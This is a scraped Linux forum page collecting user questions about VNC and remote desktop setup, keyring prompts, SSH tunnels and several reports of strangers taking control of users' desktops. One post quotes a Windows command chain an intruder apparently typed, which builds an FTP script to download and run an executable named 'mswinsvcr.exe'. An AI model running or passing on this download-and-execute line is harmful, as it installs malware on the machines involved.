Ubuntu Security :: Host Always Ask Password On 1st Remote Desktop (VNC) Access
Dec 30, 2010host always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?
View 2 Replieshost always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?
View 2 RepliesI was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
View 1 Replies View RelatedI was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
I need to be able to use an rsync command in script that will be run by cron. And it needs to be able to pass a password to rsync so that the remote server it's connecting to will authenticate.
I cannot set up ssh keys between the two servers, it's not an option. I cannot use any other language other than bash, it's my only option. I know this is highly insecure, I have no other option.
So far I have this:
rsync --rsh="/usr/bin/ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o PreferredAuthentications=password" -raxv /source/dir/* user@remotehost:/target/directory/.
This allows the script to ignore host verification and goes directly to the password prompt. I need the script to fill in this password prompt with the password that is stored in a variable.
I tried using expect, but I honestly don't know the syntax, it just keeps failing. A lot of the examples I'm finding online for expect starts off with a "spawn", which i don't have installed, and not sure if I have the ability to install it yet.
I can not access my MySQL database from any remote host on my home network, I keep getting "Access denied for user 'dbuser'@'192.168.1.10' (using password: YES)"
From what I've read this seems to be a permission problem, I tried
'dbuser'@localhost';
'dbuser'@'%';
'dbuser'@'192.168.1.10';
and between each change of permission, I've flushed privileges.
way to redirect the audit daemon message to a remote host I checked the auditd.conf and it's man page and find that the log location is specified by the line log_file = file_path and in the man page
Quote:
"log_file: This keyword specifies the full path name to the log file where audit records will be stored. It must be a regular file."
does this mean that the auditd does not have the function to redirect the logs to a remote hosts.
I was able to install and start tftp.I can tftp localhost and get a file, even from a non-administrator login.I can connect from a remote host, but the *get* times out.I suspect there is a security issue. Can you tell me how to lower the security on tftp so that a remote host can do gets?
View 4 Replies View RelatedI am using TomCat6 with Ubuntu Server 9.10 x64. I successfully configured to iptables to redirect the port "443" to "8443" (Tomcat SSL), using this command:
[code]...
Running Ubuntu 9.10. In the Remote Desktop config dialog I get: "Your desktop is only reachable over the local network. Others can access your computer using the address 127.0.0.1 or tabatha.local." I understand this means only the loopback ip address is available. All my other machines show their true local ip address (e.g., 192.168.1.104) in this dialog. Thus I cannot log on to this desktop from other machines.
When I try to do a remote logon from another Ubuntu 9.10 box (or from an XP box using a VNC viewer), I get: "Connection to 192.168.1.102 has been closed." What steps are needed to make this machine show its actual ip address? All file sharing between the various machines is working properly and all windows shares back and forth between XP and 'nix, and among the the vaious XP boxes and linux boxes are available as designed.
We recently had a vulnerability scan done on our network and one of the vulnerabilities was that the dns server discloses the remote host name when using hostname.bind.
Is there any way that we can stop this from happening? Our name server is a Fedora 11 machine.
I have succeeded in using Remote Desktop Viewer to make a VNC connection to a remote WAN computer and it was quick enough to manipulate the remote computer in real time.I found the host name by getting the remote target computer to put the following url into a browser - http://www.showmyip.com/ - It returned the address for the router which I put into the Host: text entry box in the Remote Desktop Viewer window. E.g. for my computer at the time of submitting my enquiry the address was 'host81-129-54-226.range81-129.btcentralplus.com'.The remote router that I connected to needed to have the port 5900 forwarded to the remote target computer.I now want to progress to running VNC through a SSH tunnel for additional security. In the Remote Desktop Viewer there is a configuration line
'use host' <text box to enter host name> 'as a SSH tunnel'.What is the correct syntax to enter in the text box? It would help my understanding if you used the example address above as a basis for a response.Many unexpected connection attempts reported on my router, if that was you, thank you for the novel way in responding to the question and providing the syntax.The 'bible' on syntax appears to be found here:- http://unixhelp.ed.ac.uk/CGI/man-cgi?ssh+1
I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to vnc into my server and it keep asking for a password. I never setup a password because I do this local from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the setting in System > Preferences > Remote Desktop and found them all changed. There was a password setup and there was a check mark in the you must confirm each access to this machine there some security update that changed all these setting? Sometimes when I do updates I don't know what is being changed on my server
View 9 Replies View RelatedI have set up SSH and redirected the ssh server to listen on another port other than 22 for a bit of added security.
Now in hosts.deny I have:
ALL : ALL
In hosts.allow I have:
SSH : ip_address_of_client
I can no longer connect. I get the message: ssh_exchange_identification: Connection closed by remote host.
When I change hosts.allow to read:
ALL : ip_address_of_client
I can successfully connect the server.
However, I only want to allow SSH access in hosts.allow. What is the correct syntax?
I have tried and failed with each one of these:
SSH : ip_address:port_number
SSH2 : ipaddress
sshfwd-portnumber : ip_address_of_client
So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.
1. I had to open a port on my firewall for the VNC connection.
2. I turned on the Remote Desktop
2a. Checked Allow other users to view....
2b. Checked Allow other users to control....
2c. Checked You must confirm.....
2d. Checked for password, and put in a password
2e. Checked Configure network automatically to accept connectios
So with doing all of that, am I ok? I think so, especially since it says its only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.
I can't remotely access my desktop when the desktop is asking for a keyring password. Why does this happen? it means that remote access is useless because you would need to enter the password locally before you can vnc to it. I do not wish to disable the default keyring but is there a way of making vnc work so I can enter the password.
View 8 Replies View Relatedhow i can remote access my pc at home from work ? on different pc that has access to INTERNET. what software shall I install on my pc at home ? I want to be able to install software on my pc at home from my work place, my home pc has unbuntu Linux ubuntu 2.6.31-17-generic #54-Ubuntu SMP Thu Dec 10 17:01:44 UTC 2009 x86_64 GNU/Linux
View 9 Replies View RelatedI'm trying to use Gnome's built in remote desktop viewer, Vino, to remote to my PC. When I use the vnc client on another computer to get to my OpenSuse 11.1 box, it lets me type in a password and pauses. If I look at the screen on my OpenSuse box it is waiting for the gnome keyring password and it wanting it for vino-preferences. It specifically says: The application gnome remote desktop (/usr/bin/vino-preferences) wants access to the default keyring but it is locked.
Does anybody know how to bypass needing the password for this? I'm not sure how to begin to figure this out. I've been a longtime Fedora user and vino worked fine there so I don't think this is the way it is supposed to work.
I'm trying to use Gnome's built in remote desktop viewer, Vino, to remote to my PC. When I use the vnc client on another computer to get to my OpenSuse 11.1 box, it lets me type in a password and pauses. If I look at the screen on my OpenSuse box it is waiting for the gnome keyring password and it wanting it for vino-preferences. It specifically says: The application gnome remote desktop (/usr/bin/vino-preferences) wants access to the default keyring but it is locked. Does anybody know how to bypass needing the password for this? I'm not sure how to begin to figure this out. I've been a longtime Fedora user and vino worked fine there so I don't think this is the way it is supposed to work.
View 4 Replies View RelatedToday I noticed my Desktop was being controlled remotely from over the Internet even though I had it set for 'local network only'. Foolishly I relied on this setting and hadn't specified a password or other security. The remote user had opened my Firefox passwords page and was perusing this when I pulled the plug.
All external checks confirmed that my router/firewall is actively blocking correctly. How could this happen? How can I prevent this in the future? I had recently install the Firefox extension for Weave Sync and wonder if that had anything to do with it?
I just had a window pop up on my desktop saying my pc was being remotely controlled. Ubuntu 10.10The pc shutdown by itself, and I disconnected it from the net.I rebooted and uninstalled the remote desktop app.
View 7 Replies View RelatedI just set up Remmina the other day to be able to access my desktop remotely. However, I can only do this when I am connected to my home network. Is there a way to set up Remmina so that I can connect to my desktop remotely from outside my home network?
View 4 Replies View RelatedIs it possible to remotely access, inject, manipulate files and/or folders in the Windows NTFS partition when logged into Ubuntu?
I'm either logged into Windows or Ubuntu but NOT both -- ever. Therefore, while logged into Ubuntu, would it be possible for someone to crack into Windows via Ubuntu using Wi-Fi or modem?
I've setup Debian 6 on a PC and allowed remote desktop to it.
I'm having an issue that everytime I remote desktop to it via VNC it ask for the default keyring password, but how am I supposed to enter this if I'm not by the computer that I'm trying to remotly access? Can gnome keying be disabbled altogether? Never had this issue with Debian 5.
my g/f was able to access her jobs computers from home in Windows. she'd go start->program->access->connect to remote desktop... (or something like that) in any event, i've found some programs in Fedora 14 that say they'd do the same, however i can't get it to work. in "remote desktop viewer" i'm trying to use 'VNC' protocol,and trying to put the ip in the first of the "Host" lines.
now, there might be another issue, is it possible she need more info than the ones she got in order to use LINUX remote desktop? she has (what she has written down as) Computer # 111.111.111.11 and then ';' and 4 additional numbers, so (for the sake of the example) computer#: 111.111.111.11;2222 she has a 'username' and a 'password'.
I am attempting to set up a VNC with ssh tunneling for remote desktop between my laptop (opensuse 11.2) and my desktop (kubuntu karmic) and using the instructions here: [URL] and here: [URL] but I am having trouble getting remote desktop to work once I establish the ssh tunnel
I start out with
Code:
ssh <user@remotepc> -p <non22port> -L 5900:localhost:5900
That seems to wok and connect properly
The problem comes when I try to use a remote desktop client on the laptop to initiate the VPN desktop sharing and point it to
Code:
localhost:5900
Thats when I get a notification on the host saying:
Code:
Refused uninvited connection attempt from 127.0.0.1
And on the laptop I get:
Code:
VNC server closed connection
I have tried messing with the few settings in Krfb, but none seem to have any impact. How do I open localhost:5900 and allow VPN tunneling to the host machine?
I have been using Remote desktop on Windows 7 to view and control my Ubuntu machine in the office quite happily over the office network. No problems there. I wanted to access it from my home connection so I read that I could do this by opening a port on the ubuntu machine's firewall. So I installed a firewall. Didnt see any way to open a port easily so I uninstalled it and installed another one. Same issue so I uninstalled that and then left it. I then tried to Remote Desktop the Ubuntu machine from my Windows 7 laptop and ERROR I can no longer connect.
View 6 Replies View RelatedI was working on my desktop under Ubuntu 9.10 when I got a message in the the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.
Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing. Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?
I setup a remote web server yesterday evening, which had Centos 5.3 on it. This went well, and I did this mostly over vnc, to get a GUI. However, I hadn't realised that there was a pending cron job to 'yum upgrade'. So, come 2am, 5.3 turned into 5.6. I carried on the install today, but after some time (I'm not sure exactly how or when), I lost the ability to run any GUI system config tools that required root login. I also lost the ability to run anything graphical - emacs, for example, when I was already root in an xterm.
/var/log/secure isn't telling me anything. It claims that it's running the config tool on my behalf, but nothing happens. If I try to run emacs, I get a message saying that the X server isn't responding. Could this be related to the upgrade? It feels like a PolicyKit problem - I've seen something similar on 6.0 for remote access over vnc - but 5.6 isn't running PolicyKIt.
I have 4 boxes on a local network: 2 with XP only, 1 with Ubuntu 9.10 only, and 1 with both. All boxes can share folders, set up with share-admin instead of using Nautilus right-click properties for each folder. I can see and control the remote desktops on all boxes, to all other boxes, from all other boxes,with one exception: I can only access the XP desktop on the dual boot box, not the Ubuntu desktop. When I try I get: "Connection to host 192.168.1.102 was closed." I am refused access to the Ubuntu desktop in this manner from both the other Ubuntu machine, and from both XP machines.
My setups are basically plain vanilla with routine installs of Ubuntu 9.10. On the XP machines I am using TightVNC on the XP machines to view both other XP desktops, and the Ubuntu desktop that is accessible. On both Ubuntu setups I am using (I suppose) vino and vinagre, and have completely re-installed what I think is the relevant software. There is no firewall running on the Ubuntu dual boot, when I check ufw. For reasons I cannot determine the inaccessible Ubuntu desktop is not providing its own address but instead in the Remote Desktop config dialogue it identifies itself as 27.0.0.1 which I think is the loopback id. I know so little about this sort of networking that I am not giving all relevant info, but I still thought I'd try.
I have just installed linux 10.10, I want to use vnc on my another computer to access my desktop using remote access. When I navigate to Remote esktop Preferences. Your desktop is only reachable over the local network. Others can access your computer using the address localhost, no ip address. this is not working.
View 5 Replies View Related